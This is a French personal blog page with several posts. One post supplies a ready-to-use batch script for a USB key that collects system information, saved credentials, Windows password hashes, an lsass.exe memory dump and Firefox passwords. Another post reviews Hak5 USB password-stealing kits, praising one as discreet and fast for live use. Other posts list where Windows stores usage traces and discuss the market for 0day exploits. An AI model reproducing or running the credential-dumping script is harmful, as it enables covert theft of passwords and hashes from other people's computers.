articles
réactions
Jeff - 16.02.2008 | 0 réactions | #link | rss
Alors voilà, comme c'est un sujet récurrent et à priori intéressant pour beaucoup de personnes (sans parler de leurs motivations), j'ai continué mes bidouilles après cet article.

On m'a judicieusement rappelé ce lien, que je n'étais pas allé voir depuis longtemps. Il s'agit des projets de Hak5, en l'occurrence les clés USB destinées à récupérer les mots de passe Windows.



Le projet propose plusieurs solutions, notez que plusieurs liens ne sont plus actifs (au moment où j'y suis allé). Ensuite, j'ai écarté les solutions se basant sur les clés U3, je n'avais pas envie de flasher ou débugger les outils proposés. Notez là aussi que ces procédés sont totalement réalisables, même si quelques effets de bord existent (images corrompues ou mal mises à jour) et qu'il est nécessaire de bien tester le processus avant de vouloir l'utiliser en live.

Alors, parmi les solutions restantes, je citerai "Gandalf's technique" et la "DLSS's update (v2)".
  • La première copie des fichiers sur le disque dur, les décompresse et les exécute avant de copier les résultats sur la clé et de tout effacer. Je n'ai pas eu des résultats brillants, juste quelques infos générales quand le script ne plantait pas (le répertoire temporaire sur le disque peut être accédé directement avec %temp%, cela permet de suivre l'état d'avancement du processus).

  • La deuxième semble beaucoup plus prometteuse. D'une part elle est assez discrète et rapide, d'autre part je n'ai pas eu d'effet de bord (du genre "Lsass.exe a rencontré une erreur et votre PC va rebooter dans 60 secondes"). En clair, soit cela marche et l'on récupère les hashes et autres mots de passe enregistrés, soit cela ne marche pas mais aucune erreur n'est générée (à part dans le fichier de résultats). Le tout présenté sobrement et efficacement pour s'y retrouver facilement.


Dans les 2 cas, bien placer les fichiers à la racine de la clé, sinon les scripts s'emmêlent les pinceaux et aucun résultat n'est loggé.

A suivre...
Jeff - 22.12.2007 | 1 réactions | #link | rss
Après le premier article consacré aux traces laissées dans Windows, la logique voulait que je parle des outils qui permettent de récupérer ces informations, en particulier les mots de passe.

La plupart des outils cités dans ce billet sont utilisables en ligne de commande, ce qui permet donc de les exécuter avec un simple shell (Dos). L'exception concerne Cain, qui aux dernières nouvelles supporterait tellement de fonctionnalités qu'il en devient incontournable.



Une fois ces outils téléchargés, que faire me dira-t-on? Eh bien imaginez une clé USB, avec tous les softs dessus. Le script suivant permet de récolter pas mal d'infos:

## General infos gathering: "set" et "ver" affichent les caractéristiques du système, ipconfig celles du réseau et mountvol les lecteurs
ver > infos.txt
set >> infos.txt
ipconfig /ALL >> infos.txt
mountvol >> infos.txt

## Credentials extraction: ces outils affichent le contenu du protected storage, à savoir les mots de passe enregistrés
pstoreview.exe > log1.txt
creddump.exe > log2.txt

## Hashes dump (cache as well): ces outils tentent d'extraire les hashes Windows, correspondant aux mot de passe de login, même ceux en cache (voir l'article précédent)
pwdump.exe localhost > log3.txt
fgdump.exe -r -k

## Lsass dump: ici, on dump la mémoire d'un processus en cours d'execution - lsass.exe qui contient lui aussi les hashes. Cette procédure est appliquable à d'autres processus.
pmdump.exe -list > plist.txt
type plist.txt | findstr lsass > tmp.txt
FOR /f %%a in (tmp.txt) do set pid=%%a
pmdump.exe %pid% lsass.dump
DEL tmp.txt

## Additional: extrait les mots de passe de firefox. Voir l'article
dumpAutoComplete.exe > firefox.txt


A suivre.
Jeff - 14.08.2007 | 3 réactions | #link | rss
Tout le monde sait que lors de l'utilisation de Windows, la moindre action laisse très souvent des traces ou est enregistrée à différents endroits - non que le système nous espionne, mais plutôt dans le but de faciliter les tâches récurrentes: sites visités, navigation offline, enregistrement des logins, documents ouverts, etc...

Du point de vue respect de la vie privée, ce n'est évidemment pas quelquechose de fabuleux, et on peut avoir une multitude de raisons de vouloir effacer ses traces et autres données personnelles. Je ne connais pas *tous* les endroits où se cachent ces infos, mais j'essaye de dresser ma petite liste, au fur et à mesure de mes trouvailles:


  • Dosssiers temporaires: contient très souvent les archives auto-extractibles, zip et rar, word, office, etc. Plusieurs emplacements possibles:

      Corbeille
      Recycler
      %SystemDrive%\Recycler
      C:\WINDOWS\Temp
      %WinDir%\Temp
      C:\Documents and Settings\votre_login\Local Settings\Temp
      C:\Documents and Settings\votre_login\Recent [documents récents]



  • Dossiers "cache" web, cookies, images, liens, etc. Contient des données temporaires utilisées par le navigateur:

      C:\Documents and Settings\votre_login\Cookies
      C:\Documents and Settings\votre_login\Favoris [liens IE]
      C:\Documents and Settings\votre_login\Local Settings\Historique [historique IE]
      C:\Documents and Settings\votre_login\Local Settings\Temporary Internet Files [fichiers tempo. IE]
      C:\Documents and Settings\votre_login\Local Settings\Application Data\Microsoft\Feeds Cache
      C:\Documents and Settings\votre_login\Application Data\Mozilla\Firefox\Profiles\taqxxxxx.default\bookmarkbackups [backups liens Firefox]
      C:\Documents and Settings\votre_login\Local Settings\Application Data\Mozilla\Firefox\Profiles\taqxxxxx.default

    D'une manière générale, il suffit de taper cela dans la barre d'adresses de Firefox:
    about:cache
    Apparaissent les caches (RAM et HD) utilisées par le navigateur. Il est ainsi possible de les lister (les fichiers stockés sur le disque ne sont pas lisibles directement) et donc de les effacer. Cela permet également de trouver un fichier qu'il n'est pas possible d'enregistrer via le navigateur (type video/flash/etc...).


  • Dossiers email:
    C:\Documents and Settings\votre_login\Application Data\Microsoft\Address Book [carnet d'adresses]


  • Il faut savoir que vider la corbeille ou effacer des fichiers (Suppr ou Shift+Suppr) ne permet pas réellement d'effacer les données sur le disque dur. Il reste des moyens pour les restaurer en lisant le disque dur directement, en bas niveau.
    Ceci est quasiment toujours valable, à moins d'avoir une machine avec beaucoup de mouvements et d'enregistrements qui risquent de réécrire par-dessus les données "effacées".
    Pour récupérer des fichiers, il existe différents outils (la plupart du temps payants):

    • Stellar Phoenix
    • Recover My Files
    • etc...



    Pour effacer réellement les fichiers, il faut explicitement réécrire sur les zones du disque dur où étaient stockées les données. Plusieurs outils existent et offrent, à priori, de bons résultats:
    - Eraser est gratuit et proposent différentes méthodes. Il s'interface dans Windows (menu contextuel, corbeille, etc).
    - à venir


  • En ce qui concerne la récupération de fichiers "effacés", je suis tombé récemment sur des produits spécifiques pour médias amovibles, types clés USB, cartes mémoires, appareils photo, etc. Bien sûr, cela doit fonctionner comme un disque dur, me direz-vous. Et bien non, en fait ce n'est pas tout à fait pareil. Un disque dur est un support de stockage par écriture électromagnétique (galettes et têtes) alors que les cartes mémoires contiennent de la mémoire dite flash, eeprom ou autre. L'écriture se fait électriquement afin de changer l'état de chaque cellule de mémoire. En pratique, on appelle ces opérations des "cycles", et les fabricants garantissent un nombre minimal de cycles sans erreur. Au-delà, il se peut que des erreurs apparaissent, c'est-à-dire que des cellules soient défectueuses ou tout simplement mortes.
    Le nombre de cycles garantis n'excède habituellement pas les 100'000 ou 500'000. C'est pourquoi, il n'est pas recommandé d'utiliser une clé USB comme RAM disk par exemple, ni comme un disque dur externe, tout simplement parceque les utilisations faites de ces derniers ne correspondent pas aux types de mémoires flash...
    En contrepartie, les fabricants de flash ont développé des algorithmes d'écriture bas niveau afin de rallonger la durée de vie de leurs produits. Concrètement, l'agorithme va se charger d'éviter qu'une écriture ne se produise toujours au même endroit, en répartissant les données sur différentes zones. Un algorithme connu est appelé "wear levelling".
    Ce qu'il faut retenir, c'est donc le fait que la vision logique des données ne correspond pas à la réalité physique de la mémoire amovible. Très souvent les données restent présentes sur le support.

Jeff - 22.01.2007 | 0 réactions | #link | rss
Cela devait bien finir par arriver. Je veux dire aux oreilles du grand public. La bataille fait rage actuellement sur FD (entre autres) au sujet de l'achat/vente de failles dites 0day (inconnues donc indétectables) sur de nombreux logiciels ou systèmes tels que Windows Vista.

Il faut comprendre qu'à la base le sujet de discussion tournait plus autour des tarifs appliqués que du côté éthique de la chose: 1000 à 2000$ pour certains, jusqu'à 75000$ pour d'autres. Ce qui signifie implicitement que ce marché existe bien et qu'il devient important.

Certains me diront que cette tendance est connue depuis longtemps. Effectivement, on peut se rappeler de la fameuse faille wmf sur Windows il y a plus d'un an, qui avait déjà fait l'objet de plusieurs transactions avant d'apparaître -volontairement ou non- aux yeux du grand public. Tout se passait donc au black, dans des milieux bien à l'est (.ru) de nos préoccupations courantes.
Mais voilà qu'aujourd'hui ce marché apparaît au grand jour et tout le monde trouve normal qu'il subisse les lois immuables de l'offre et de la demande. Ceci inclut la présence de courtiers, en charge de trouver des failles intéressantes pour ensuite les revendre à des tierces parties dont les motivations restent plus ou moins floues. En effet, on peut se demander quel intérêt peut avoir une société ou un organisme gouvernem^H^H^H de posséder des failles non-publiques permettant de pénétrer des systèmes à distance, et ce en toute discrétion?

Ok, je schématise un peu, mais je ne vois pas non plus d'autre raison...

Autre effet que je qualifierais de pervers, celui de l'argent. Jamais les moyens mis en oeuvre pour monter une attaque n'auront été aussi "factorisables" au critère ultime qu'est l'argent. En clair, il suffit désormais d'avoir un minimum d'argent pour pallier le manque de compétences, de temps, etc. Et de se proclamer tout-puissant virtuel. A ce jeu, les dindons de la farce resteront les utilisateurs de base (quand je vois Windows Vista mentionné toutes les 2 lignes, que l'on ne vienne pas me dire que cela ne concerne pas les utilisateurs standards).



<MOUARF>
PS: AHAHAHAHAH petit scarabé de moteur de blog vicelard (le moteur pas le blog, encore que connaissant son créateur...) Encore une fois tu as essayé de m'avoir... Mais non, j'avais tout copié dans mon fichier avant de cliquer "poster"!!! Et paf! T'as eu beau me sortir une erreur bidon du genre "je suis allé aux chiottes pendant que tu tapais, j'ai rien vu" ou "erreur #124657247 version 454 beta 33435566 - vos données sont perdues", cela n'a servi à rien. Alors, c'est qui le bosssssss???????

Et toi, la popup, je te pi*** à la r***.
</MOUARF>
FutureBlogs - v.0.8.6beta - Ce site est hébergé par http://monblog.ch